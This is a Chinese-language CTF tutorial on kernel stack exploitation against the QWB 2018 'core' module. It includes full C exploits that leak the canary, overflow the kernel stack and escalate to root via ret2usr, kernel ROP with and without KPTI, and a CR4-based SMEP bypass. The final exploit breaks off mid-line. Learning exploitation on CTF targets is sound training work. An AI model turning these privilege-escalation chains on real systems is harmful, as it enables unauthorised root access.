前言 由于 typora 编辑起来太卡了,所以已将基础部分迁移至《深入理解Pwn_Kernel基础篇》
内核栈利用 QWB_2018_core 题目分析 start.sh
1 2 3 4 5 6 7 8 qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -s \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \
开启了 kaslr保护。
如果使用的是自己编译的 qemu,可能会报错 network backend 'user' is not compiled into this binary,解决方法是先 sudo apt-get install libslirp-dev,然后以 ./configure --enable-slirp 重新配置并编译 qemu。
init
解压 core.cpio ,分析 init 文件:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: init ───────┼───────────────────────────────────────────────────────────────────────────────── 1 │ 2 │ mount -t proc proc /proc 3 │ mount -t sysfs sysfs /sys 4 │ mount -t devtmpfs none /dev 5 │ /sbin/mdev -s 6 │ mkdir -p /dev/pts 7 │ mount -vt devpts -o gid=4,mode=620 none /dev/pts 8 │ chmod 666 /dev/ptmx 9 │ cat /proc/kallsyms > /tmp/kallsyms 10 │ echo 1 > /proc/sys/kernel/kptr_restrict 11 │ echo 1 > /proc/sys/kernel/dmesg_restrict 12 │ ifconfig eth0 up 13 │ udhcpc -i eth0 14 │ ifconfig eth0 10.0.2.15 netmask 255.255.255.0 15 │ route add default gw 10.0.2.2 16 │ insmod /core.ko 17 │ 18 │ poweroff -d 120 -f & 19 │ setsid /bin/cttyhack setuidgid 1000 /bin/sh 20 │ echo 'sh end!\n' 21 │ umount /proc 22 │ umount /sys 23 │ 24 │ poweroff -d 0 -f ───────┴────────────────────────────
第 9 行中把 kallsyms 的内容保存到了 /tmp/kallsyms 中,那么我们就能从 /tmp/kallsyms 中读取 commit_creds,prepare_kernel_cred 的函数的地址了
第 10 行把 kptr_restrict 设为 1,这样就不能通过 /proc/kallsyms 查看函数地址了,但第 9 行已经把其中的信息保存到了一个可读的文件中,这句就无关紧要了
第 11 行把 dmesg_restrict 设为 1,这样就不能通过 dmesg 查看 kernel 的信息了
第 18 行设置了定时关机,为了避免做题时产生干扰,直接把这句删掉然后重新打包
里面还有一个 gen_cpio.sh 脚本,用于快速打包。
1 2 3 4 5 6 7 ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: gen_cpio.sh ───────┼───────────────────────────────────────────────────────────────────────────────── 1 │ find . -print0 \ 2 │ | cpio --null -ov --format=newc \ 3 │ | gzip -9 > $1 ───────┴─────────────────────────────────────────────────────────────────────────────────
core.ko
检查一下保护。
1 2 3 4 5 6 7 ❯ checksec core/core.ko [*] '/home/pwn/kernel/pwn/give_to_player/core/core.ko' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x0)
使用 IDA 继续分析.ko文件。
init_module() 注册了 /proc/core
1 2 3 4 5 6 __int64 init_module () { core_proc = proc_create("core" , 438LL , 0LL , &core_fops); printk(&unk_2DE); return 0LL ; }
exit_core()删除 /proc/core。
1 2 3 4 5 6 7 8 __int64 exit_core () { __int64 result; if ( core_proc ) result = remove_proc_entry("core" ); return result; }
core_ioctl() 定义了三条命令,分别调用 core_read(), core_copy_func()和设置全局变量 off。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 __int64 __fastcall core_ioctl (__int64 a1, int a2, __int64 a3) { switch ( a2 ) { case 0x6677889B : core_read(a3); break ; case 0x6677889C : printk(&unk_2CD); off = a3; break ; case 0x6677889A : printk(&unk_2B3); core_copy_func(a3); break ; } return 0LL ; }
core_read() 从 v4[off] 拷贝 64 个字节到用户空间,但要注意的是全局变量 off 是我们能够控制的,因此可以合理的控制 off 来 leak canary 和一些地址 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 void __fastcall core_read (__int64 a1) { __int64 v1; char *v2; signed __int64 i; char v4[64 ]; unsigned __int64 v5; v1 = a1; v5 = __readgsqword(0x28 u); printk("\x016core: called core_read\n" ); printk("\x016%d %p\n" ); v2 = v4; for ( i = 16LL ; i; --i ) { *(_DWORD *)v2 = 0 ; v2 += 4 ; } strcpy (v4, "Welcome to the QWB CTF challenge.\n" ); if ( copy_to_user(v1, &v4[off], 64LL ) ) __asm { swapgs } }
core_copy_func() 从全局变量 name 中拷贝数据到局部变量中,长度是由我们指定的,但要注意的是 qmemcpy 用的是 unsigned __int16,而传递的长度是 signed __int64。因此如果控制传入的长度为 0xffffffffffff0000|(0x100) 等值,它作为有符号数是负数,可以通过 a1 > 63 的检查,而截断后的低 16 位(0x100)才是实际拷贝的长度,这样就可以栈溢出了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 __int64 __fastcall core_copy_func (__int64 a1) { __int64 result; _QWORD v2[10 ]; v2[8 ] = __readgsqword(0x28 u); printk(&unk_215); if ( a1 > 63 ) { printk(&unk_2A1); return 0xFFFFFFFF LL; } else { result = 0LL ; qmemcpy(v2, &name, (unsigned __int16)a1); } return result; }
core_write() 向全局变量 name 上写,这样通过 core_write() 和 core_copy_func() 就可以控制 ropchain 了 。
1 2 3 4 5 6 7 8 9 10 11 signed __int64 __fastcall core_write (__int64 a1, __int64 a2, unsigned __int64 a3) { unsigned __int64 v3; v3 = a3; printk("\x016core: called core_writen" ); if ( v3 <= 0x800 && !copy_from_user(name, a2, v3) ) return (unsigned int )v3; printk("\x016core: error copying data from userspacen" ); return 0xFFFFFFF2 LL; }
动态调试 关闭 kaslr 并将权限调到 root,通过 add-symbol-file core.ko textaddr 把 core.ko 符号加载进去。
1 2 3 4 5 6 7 8 #!/bin/sh gdb -q \ -ex "file $(find . -name vmlinux) " \ -ex "add-symbol-file $(find . -name core.ko) 0xffffffffc0000000" \ -ex "target remote localhost:1234" \ -ex "b *0xffffffffc000015f" \ -ex "c"
exp 都很简单,很容易看懂,就不调试了。
ret2user 内核态的 ROP 与用户态的 ROP 一般无二,只不过利用的 gadget 变成了内核中的 gadget,所需要构造执行的 ropchain 由system("/bin/sh") 变为了 commit_creds(&init_cred) 或 commit_creds(prepare_kernel_cred(NULL)),当我们成功地在内核中执行这样的代码后,当前线程的 cred 结构体便变为 init 进程的 cred 的拷贝,我们也就获得了 root 权限,此时在用户态起一个 shell 便能获得 root shell。
状态保存
通常情况下,我们的 exploit 需要进入到内核当中完成提权,而我们最终仍然需要着陆回用户态以获得一个 root 权限的 shell,因此在我们的 exploit 进入内核态之前我们需要手动模拟用户态进入内核态的准备工作—— 保存各寄存器的值到内核栈上,以便于后续着陆回用户态。通常情况下使用如下函数保存各寄存器值到我们自己定义的变量中,以便于构造 rop 链:
算是一个通用的 pwn 板子。
方便起见,使用了内联汇编,编译时需要指定参数:-masm=intel。
1 2 3 4 5 6 7 8 9 10 11 size_t user_cs, user_ss, user_rflags, user_sp;void saveStatus () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("\033[34m\033[1m[*] Status has been saved.\033[0m" ); }
返回用户态
由内核态返回用户态只需要:
swapgs指令通过用一个MSR中的值交换GS寄存器的内容,用来获取指向内核数据结构的指针,然后才能执行系统调用之类的内核空间程序。也用于恢复用户态 GS 寄存器。
sysretq或者iretq恢复到用户空间
那么我们只需要在内核中找到相应的 gadget 并执行swapgs;iretq就可以成功着陆回用户态。
执行 iretq 时的栈布局。
1 2 3 4 5 6 7 8 9 10 11 |----------------------| | RIP |<== low mem |----------------------| | CS | |----------------------| | EFLAGS | |----------------------| | RSP | |----------------------| | SS |<== high mem |----------------------|
所以我们应当构造如下 rop 链以返回用户态并获得一个 shell:
1 2 3 4 5 6 7 ↓ swapgs iretq user_shell_addr user_cs user_eflags user_sp user_ss
利用思路 在未开启 SMAP/SMEP 保护的情况下,用户空间无法访问内核空间的数据,但是内核空间可以访问 / 执行用户空间的数据,因此 ret2usr 这种攻击手法应运而生,以内核的 ring 0 权限执行用户空间的代码以完成提权。ret2user 即返回到用户空间的提权代码上进行提权,之后返回用户态即为 root 权限。通常 CTF 中的 ret2usr 还是以执行commit_creds(prepare_kernel_cred(NULL))进行提权为主要的攻击手法,不过相比起构造冗长的 ROP chain,ret2usr 只需要我们提前在用户态程序构造好对应的函数指针、获取相应函数地址后直接 ret 回到用户空间执行即可。另外题目给的 vmlinux 可以用于提取 gadget,但使用 IDA 分析时太慢,可以用 vmlinux-to-elf 解压 bzImage 进行分析。
从 /tmp/kallsyms 读取符号地址,确认与nokaslr偏移,从vmlinux寻找gadget。
保存用户状态。
通过设置 off 读取 canary。
于内核态访问用户空间的 commit_creds(prepare_kernel_cred(NULL))提权。
通过 swapgs; mov rsp, tf_addr; iretq(先把 rsp 指向预先构造好的 trap_frame)返回用户空间,并执行 system("/bin/sh");。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> #define KERNCALL __attribute__((regparm(3))) void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0 ;void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0 ;void *init_cred = (void *) 0xFFFFFFFF8223D1A0 ;void get_shell () { system("/bin/sh" ); }struct trap_frame { size_t user_rip; size_t user_cs; size_t user_rflags; size_t user_sp; size_t user_ss; } __attribute__((packed)); struct trap_frame tf ;size_t user_cs, user_rflags, user_sp, user_ss, tf_addr = (size_t ) &tf;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); tf.user_rip = (size_t ) get_shell; tf.user_cs = user_cs; tf.user_rflags = user_rflags; tf.user_sp = user_sp - 0x1000 ; tf.user_ss = user_ss; puts ("[*] status has been saved." 
); } void get_root () { commit_creds(init_cred); asm ("swapgs;" "mov rsp, tf_addr;" "iretq;" ); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds = (void *) ((size_t ) commit_creds + offset); prepare_kernel_cred = (void *) ((size_t ) prepare_kernel_cred + offset); init_cred = (void *) ((size_t ) init_cred + offset); break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { rebase(); save_status(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." ); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; *(void **) &buf[80 ] = get_root; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
kernel rop without KPTI 开启 smep 和 smap 保护后,内核空间无法执行用户空间的代码,并且无法访问用户空间的数据。因此不能直接 ret2user 。利用 ROP ,执行 commit_creds(prepare_kernel_cred(0)) , 然后 iret 返回用户空间可以绕过上述保护。
添加 smep 和 smap 保护。
1 2 3 4 5 6 7 8 9 qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \ -s \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \ -cpu qemu64,+smep,+smap
由于找不到 mov rdi, rax; ret; 这条 gadget ,因此需要用 mov rdi, rax; call rdx; 代替,其中 rdx 指向 pop rcx; ret; 可以清除 call 指令压入栈中的 rip ,因此相当于 ret 。
利用思路
从 /tmp/kallsyms 读取符号地址,确认与nokaslr偏移,从vmlinux寻找gadget。
保存用户状态。
通过设置 off 读取 canary。
于内核空间 rop 调用 commit_creds(prepare_kernel_cred(NULL))提权。
通过 swapgs; popfq; ret; 和 iretq 这两条 gadget 返回用户空间,并执行 system("/bin/sh");。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t pop_rdx_ret = 0xffffffff810a0f49 ;size_t pop_rcx_ret = 0xffffffff81021e53 ;size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a ;size_t swapgs_popfq_ret = 0xffffffff81a012da ;size_t iretq = 0xffffffff81050ac2 ;void get_shell () { system("/bin/sh" ); } size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." 
); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; pop_rdx_ret += offset; pop_rcx_ret += offset; mov_rdi_rax_call_rdx += offset; swapgs_popfq_ret += offset; iretq += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { save_status(); rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." 
); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; size_t *rop = (size_t *) &buf[80 ], it = 0 ; rop[it++] = pop_rdi_ret; rop[it++] = 0 ; rop[it++] = prepare_kernel_cred; rop[it++] = pop_rdx_ret; rop[it++] = pop_rcx_ret; rop[it++] = mov_rdi_rax_call_rdx; rop[it++] = commit_creds; rop[it++] = swapgs_popfq_ret; rop[it++] = 0 ; rop[it++] = iretq; rop[it++] = (size_t ) get_shell; rop[it++] = user_cs; rop[it++] = user_rflags; rop[it++] = user_sp; rop[it++] = user_ss; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
kernel rop with KPTI 开启 KPTI
1 2 3 4 5 6 7 8 9 10 #!/bin/sh qemu-system-x86_64 \ -m 256M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \ -s \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \ -cpu kvm64,+smep,+smap
利用思路 此时需要借助 swapgs_restore_regs_and_return_to_usermode 返回用户态。该函数是内核在 arch/x86/entry/entry_64.S 中提供的一个用于完成内核态到用户态切换的函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 .text:FFFFFFFF81A008DA ; __int64 swapgs_restore_regs_and_return_to_usermode(void) .text:FFFFFFFF81A008DA public swapgs_restore_regs_and_return_to_usermode .text:FFFFFFFF81A008DA swapgs_restore_regs_and_return_to_usermode proc near .text:FFFFFFFF81A008DA ; CODE XREF: ;entry_SYSCALL_64_after_hwframe+4D↑j .text:FFFFFFFF81A008DA ; entry_SYSCALL_64_after_hwframe+5E↑j ... .text:FFFFFFFF81A008DA pop r15 .text:FFFFFFFF81A008DC pop r14 .text:FFFFFFFF81A008DE pop r13 .text:FFFFFFFF81A008E0 pop r12 .text:FFFFFFFF81A008E2 pop rbp .text:FFFFFFFF81A008E3 pop rbx .text:FFFFFFFF81A008E4 pop r11 .text:FFFFFFFF81A008E6 pop r10 .text:FFFFFFFF81A008E8 pop r9 .text:FFFFFFFF81A008EA pop r8 .text:FFFFFFFF81A008EC pop rax .text:FFFFFFFF81A008ED pop rcx .text:FFFFFFFF81A008EE pop rdx .text:FFFFFFFF81A008EF pop rsi .text:FFFFFFFF81A008F0 mov rdi, rsp ; jump this .text:FFFFFFFF81A008F3 mov rsp, gs:qword_5004 .text:FFFFFFFF81A008FC push qword ptr [rdi+30h] .text:FFFFFFFF81A008FF push qword ptr [rdi+28h] .text:FFFFFFFF81A00902 push qword ptr [rdi+20h] .text:FFFFFFFF81A00905 push qword ptr [rdi+18h] .text:FFFFFFFF81A00908 push qword ptr [rdi+10h] .text:FFFFFFFF81A0090B push qword ptr [rdi] .text:FFFFFFFF81A0090D push rax .text:FFFFFFFF81A0090E jmp short loc_FFFFFFFF81A00953 [......] ;loc_FFFFFFFF81A00953 .text:FFFFFFFF81A00953 loc_FFFFFFFF81A00953: ; CODE XREF: ;swapgs_restore_regs_and_return_to_usermode+34↑j .text:FFFFFFFF81A00953 pop rax .text:FFFFFFFF81A00954 pop rdi .text:FFFFFFFF81A00955 swapgs .text:FFFFFFFF81A00958 jmp native_iret .text:FFFFFFFF81A00958 swapgs_restore_regs_and_return_to_usermode endp [......] ;native_iret .text:FFFFFFFF81A00980 test [rsp+arg_18], 4 .text:FFFFFFFF81A00985 jnz short native_irq_return_ldt .text:FFFFFFFF81A00985 native_iret endp [......] 
;native_irq_return_ldt .text:FFFFFFFF81A00989 push rdi .text:FFFFFFFF81A0098A swapgs .text:FFFFFFFF81A0098D jmp short loc_FFFFFFFF81A009A1 [......] ;loc_FFFFFFFF81A009A1 .text:FFFFFFFF81A009A1 mov rdi, gs:qword_F000 .text:FFFFFFFF81A009AA mov [rdi], rax .text:FFFFFFFF81A009AD mov rax, [rsp+8] .text:FFFFFFFF81A009B2 mov [rdi+8], rax .text:FFFFFFFF81A009B6 mov rax, [rsp+8+arg_0] .text:FFFFFFFF81A009BB mov [rdi+10h], rax .text:FFFFFFFF81A009BF mov rax, [rsp+8+arg_8] .text:FFFFFFFF81A009C4 mov [rdi+18h], rax .text:FFFFFFFF81A009C8 mov rax, [rsp+8+arg_18] .text:FFFFFFFF81A009CD mov [rdi+28h], rax .text:FFFFFFFF81A009D1 mov rax, [rsp+8+arg_10] .text:FFFFFFFF81A009D6 mov [rdi+20h], rax .text:FFFFFFFF81A009DA and eax, 0FFFF0000h .text:FFFFFFFF81A009DF or rax, gs:qword_F008 .text:FFFFFFFF81A009E8 push rax .text:FFFFFFFF81A009E9 jmp short loc_FFFFFFFF81A00A2E [......] ;loc_FFFFFFFF81A00A2E .text:FFFFFFFF81A00A2E pop rax .text:FFFFFFFF81A00A2F swapgs .text:FFFFFFFF81A00A32 pop rdi .text:FFFFFFFF81A00A33 mov rsp, rax .text:FFFFFFFF81A00A36 pop rax .text:FFFFFFFF81A00A37 jmp native_irq_return_iret [......] ;native_irq_return_iret .text:FFFFFFFF81A00987 iretq .text:FFFFFFFF81A00987 native_irq_return_iret endp
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t pop_rdx_ret = 0xffffffff810a0f49 ;size_t pop_rcx_ret = 0xffffffff81021e53 ;size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a ;size_t swapgs_popfq_ret = 0xffffffff81a012da ;size_t iretq = 0xffffffff81050ac2 ;size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA ;void get_shell () { system("/bin/sh" ); } size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." 
); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; pop_rdx_ret += offset; pop_rcx_ret += offset; mov_rdi_rax_call_rdx += offset; swapgs_popfq_ret += offset; iretq += offset; swapgs_restore_regs_and_return_to_usermode += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { save_status(); rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." 
); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; size_t *rop = (size_t *) &buf[80 ], it = 0 ; rop[it++] = pop_rdi_ret; rop[it++] = 0 ; rop[it++] = prepare_kernel_cred; rop[it++] = pop_rdx_ret; rop[it++] = pop_rcx_ret; rop[it++] = mov_rdi_rax_call_rdx; rop[it++] = commit_creds; rop[it++] = swapgs_restore_regs_and_return_to_usermode + 0x16 ; rop[it++] = 0 ; rop[it++] = 0 ; rop[it++] = (size_t ) get_shell; rop[it++] = user_cs; rop[it++] = user_rflags; rop[it++] = user_sp; rop[it++] = user_ss; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
kernel rop + ret2user 利用思路 这种方法实际上是将前两种方法结合起来,同样可以绕过 smap 和 smep 保护。大体思路是先利用 rop 设置 cr4 为 0x6f0 来关闭 smep(0x6f0 是一个常用的固定值,其中 SMEP 位即 bit 20 为 0;也可以用 cr4 原始值 & 0xFFFFF 清除 bit 20 及以上的位),然后 ret 到用户空间的提权代码(此时仍以 ring 0 权限执行),提权完成后再通过 swapgs 和 iretq 返回用户态。
例如,当
1 $CR4 = 0x1407f0 = 000 1 0100 0000 0111 1111 0000
时,smep 保护开启。而 CR4 寄存器是可以通过 mov 指令修改的,因此只需要
1 2 mov cr4, 0x0407f0 # 0x0407f0 = 0000 0100 0000 0111 1111 0000(bit 20 即 SMEP 位被清零)
即可关闭 smep 保护。
搜索一下从 vmlinux 中提取出的 gadget,很容易就能达到这个目的。
如何查看 CR4 寄存器的值?
gdb 无法查看 cr4 寄存器的值,可以通过 kernel crash 时的信息查看。为了关闭 smep 保护,常用一个固定值 0x6f0,即 mov cr4, 0x6f0。
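exp 注意这里 smap 保护不能直接关闭,因此不能像前面 ret2usr 那样直接在 exp 中写入 trap frame 然后栈迁移到 trap frame 的地址,而是在 rop 中构造 trap frame 结构。另外要注意,下面 exp 的 rebase() 中没有给 mov_cr4_rdi_ret 加上 offset,如果在开启 kaslr 的环境下运行,需要补上 mov_cr4_rdi_ret += offset;。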
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> #define KERNCALL __attribute__((regparm(3))) void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0 ;void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0 ;void *init_cred = (void *) 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t pop_rdx_ret = 0xffffffff810a0f49 ;size_t pop_rcx_ret = 0xffffffff81021e53 ;size_t mov_cr4_rdi_ret = 0xffffffff81075014 ;size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a ;size_t swapgs_popfq_ret = 0xffffffff81a012da ;size_t iretq = 0xffffffff81050ac2 ;void get_shell () { system("/bin/sh" ); }size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." 
); } void get_root () { commit_creds(prepare_kernel_cred(0 )); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds = (void *) ((size_t ) commit_creds + offset); prepare_kernel_cred = (void *) ((size_t ) prepare_kernel_cred + offset); init_cred = (void *) ((size_t ) init_cred + offset); pop_rdi_ret += offset; pop_rdx_ret += offset; pop_rcx_ret += offset; mov_rdi_rax_call_rdx += offset; swapgs_popfq_ret += offset; iretq += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] 